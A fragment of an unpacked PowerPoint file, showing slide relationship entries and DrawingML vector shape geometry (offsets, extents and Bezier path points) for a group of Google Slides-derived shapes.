Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag327.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag326.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image6.jpeg"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide30.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag445.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag444.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag443.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag442.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag441.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag440.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag439.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag438.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag447.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag446.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image6.jpeg"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide31.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag456.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag455.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag454.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag453.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag452.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag451.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag450.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag449.xml"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide27.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag458.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag457.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag448.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide32.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide28.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag461.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag460.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag459.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide33.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide29.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag463.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image12.png"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag462.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide34.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag471.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag470.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag469.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag468.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag467.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag466.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag465.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag464.xml"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide30.xml"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout5.xml"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag474.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image5.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag473.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag472.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image13.jpeg"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide4.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag336.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag335.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag334.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag333.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag332.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag331.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag330.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag329.xml"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1.xml"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image8.png"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag338.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4.svg"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image7.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag337.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag32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2.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image8.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag343.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag342.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag341.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image9.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag340.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag339.xml"/></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3.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag346.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag345.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag344.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide7.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide4.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout28.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image8.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag348.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag347.xml"/></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44.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag350.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag349.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6.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout45.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag352.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag351.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89" name="Google Shape;56;p15"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm flipH="1">
            <a:off x="10504805" y="4194810"/>
            <a:ext cx="2939415" cy="4041775"/>
            <a:chOff x="-1006072" y="1271750"/>
            <a:chExt cx="4357952" cy="5991287"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="90" name="Google Shape;57;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1068003"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1" name="Google Shape;58;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="136840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2" name="Google Shape;59;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="166885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3" name="Google Shape;60;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1968814"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4" name="Google Shape;61;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2269261"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5" name="Google Shape;62;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2569708"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6" name="Google Shape;63;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2866777"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7" name="Google Shape;64;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1055875" y="4208223"/>
              <a:ext cx="502564" cy="182865"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="12348" h="4493" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="9838" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="9200" y="0"/>
                    <a:pt x="8568" y="272"/>
                    <a:pt x="8132" y="800"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7799" y="1192"/>
                    <a:pt x="7620" y="1669"/>
                    <a:pt x="7608" y="2145"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="2941" y="2181"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="2906" y="1847"/>
                    <a:pt x="2739" y="1514"/>
                    <a:pt x="2465" y="1264"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2206" y="1047"/>
                    <a:pt x="1887" y="940"/>
                    <a:pt x="1570" y="940"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1173" y="940"/>
                    <a:pt x="778" y="1107"/>
                    <a:pt x="500" y="1431"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="2002"/>
                    <a:pt x="84" y="2883"/>
                    <a:pt x="655" y="3395"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="915" y="3612"/>
                    <a:pt x="1233" y="3719"/>
                    <a:pt x="1550" y="3719"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1947" y="3719"/>
                    <a:pt x="2342" y="3552"/>
                    <a:pt x="2620" y="3228"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2822" y="3002"/>
                    <a:pt x="2917" y="2728"/>
                    <a:pt x="2953" y="2443"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="7620" y="2395"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="7668" y="2978"/>
                    <a:pt x="7918" y="3562"/>
                    <a:pt x="8418" y="3955"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="8832" y="4316"/>
                    <a:pt x="9346" y="4492"/>
                    <a:pt x="9859" y="4492"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="10496" y="4492"/>
                    <a:pt x="11131" y="4220"/>
                    <a:pt x="11573" y="3693"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="12347" y="2752"/>
                    <a:pt x="12228" y="1335"/>
                    <a:pt x="11288" y="538"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="10868" y="176"/>
                    <a:pt x="10351" y="0"/>
                    <a:pt x="9838" y="0"/>
                  </a:cubicBez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8" name="Google Shape;65;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1063608" y="2410971"/>
              <a:ext cx="94546" cy="94546"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="2323" h="2323" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="1168" y="1"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="525" y="1"/>
                    <a:pt x="1" y="525"/>
                    <a:pt x="1" y="1167"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="1799"/>
                    <a:pt x="525" y="2322"/>
                    <a:pt x="1168" y="2322"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1811" y="2322"/>
                    <a:pt x="2323" y="1799"/>
                    <a:pt x="2323" y="1167"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2323" y="525"/>
                    <a:pt x="1811" y="1"/>
                    <a:pt x="1168"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99" name="Google Shape;66;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1063608" y="2277721"/>
              <a:ext cx="94546" cy="94546"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="2323" h="2323" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="1168" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="525" y="0"/>
                    <a:pt x="1" y="524"/>
                    <a:pt x="1" y="1167"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="1798"/>
                    <a:pt x="525" y="2322"/>
                    <a:pt x="1168" y="2322"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1811" y="2322"/>
                    <a:pt x="2323" y="1798"/>
                    <a:pt x="2323" y="1167"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2323" y="524"/>
                    <a:pt x="1811" y="0"/>
                    <a:pt x="1168"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0" name="Google Shape;67;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1069916" y="1822700"/>
              <a:ext cx="914936" cy="110053"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="22480" h="2704" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="1" y="1"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1" y="2703"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="22480" y="2703"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2248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1" name="Google Shape;68;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1069916" y="1981143"/>
              <a:ext cx="745828" cy="54335"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="18325" h="1335" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="1" y="1"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1" y="1334"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18324" y="1334"/>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2" name="Google Shape;69;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1069916" y="2069828"/>
              <a:ext cx="745828" cy="54823"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="18325" h="1347" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="1" y="1"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1" y="1346"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18324" y="1346"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18324"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3" name="Google Shape;70;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1069916" y="2158512"/>
              <a:ext cx="489947" cy="54335"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="12038" h="1335" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="1" y="1"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1" y="1334"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12038" y="1334"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12038"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4" name="Google Shape;71;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1130966"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5" name="Google Shape;72;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1267636" y="5001539"/>
              <a:ext cx="219536" cy="194831"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="5394" h="4787" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="3334" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="4787"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2060" y="4787"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="539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6" name="Google Shape;73;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1403330" y="5001539"/>
              <a:ext cx="220513" cy="194831"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="5418" h="4787" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="3346" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="4787"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2084" y="4787"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5418"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7" name="Google Shape;74;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1539471" y="5001539"/>
              <a:ext cx="220065" cy="194831"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="5407" h="4787" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="3335" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1" y="4787"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2073"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8" name="Google Shape;75;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1675653"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09" name="Google Shape;76;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1811835" y="5001539"/>
              <a:ext cx="220024" cy="194831"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="5406" h="4787" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="3334" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="4787"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2072" y="4787"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5406"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0" name="Google Shape;77;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1598120" y="4774272"/>
              <a:ext cx="1247862" cy="2488764"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="30660" h="61149" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="727" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="11014"/>
                    <a:pt x="3072" y="44744"/>
                    <a:pt x="4144" y="56293"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4168" y="56603"/>
                    <a:pt x="4453" y="56960"/>
                    <a:pt x="4477" y="57245"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4644" y="59019"/>
                    <a:pt x="4751" y="60091"/>
                    <a:pt x="4751" y="60258"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4779" y="60847"/>
                    <a:pt x="6567" y="61148"/>
                    <a:pt x="8454" y="61148"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="10570" y="61148"/>
                    <a:pt x="12810" y="60770"/>
                    <a:pt x="12835" y="59996"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="12871" y="57055"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13276" y="56186"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15633" y="14514"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="15615" y="14003"/>
                    <a:pt x="15763" y="13674"/>
                    <a:pt x="15908" y="13674"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="16040" y="13674"/>
                    <a:pt x="16169" y="13945"/>
                    <a:pt x="16169" y="14597"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="16122" y="24872"/>
                    <a:pt x="18622" y="46697"/>
                    <a:pt x="19003" y="55733"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="19027" y="55948"/>
                    <a:pt x="19348" y="56162"/>
                    <a:pt x="19348" y="56364"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="19455" y="58567"/>
                    <a:pt x="19527" y="59936"/>
                    <a:pt x="19539" y="60079"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="19635" y="60525"/>
                    <a:pt x="21296" y="60734"/>
                    <a:pt x="23092" y="60734"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="25274" y="60734"/>
                    <a:pt x="27656" y="60426"/>
                    <a:pt x="27683" y="59865"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="27683" y="59734"/>
                    <a:pt x="27790" y="58424"/>
                    <a:pt x="27921" y="56257"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="27933" y="56007"/>
                    <a:pt x="28171" y="55733"/>
                    <a:pt x="28194" y="55448"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="28921" y="44041"/>
                    <a:pt x="30659" y="13573"/>
                    <a:pt x="29385" y="48"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="29385" y="48"/>
                    <a:pt x="15360" y="0"/>
                    <a:pt x="727"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1" name="Google Shape;78;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1615091" y="4944844"/>
              <a:ext cx="1192103" cy="155596"/>
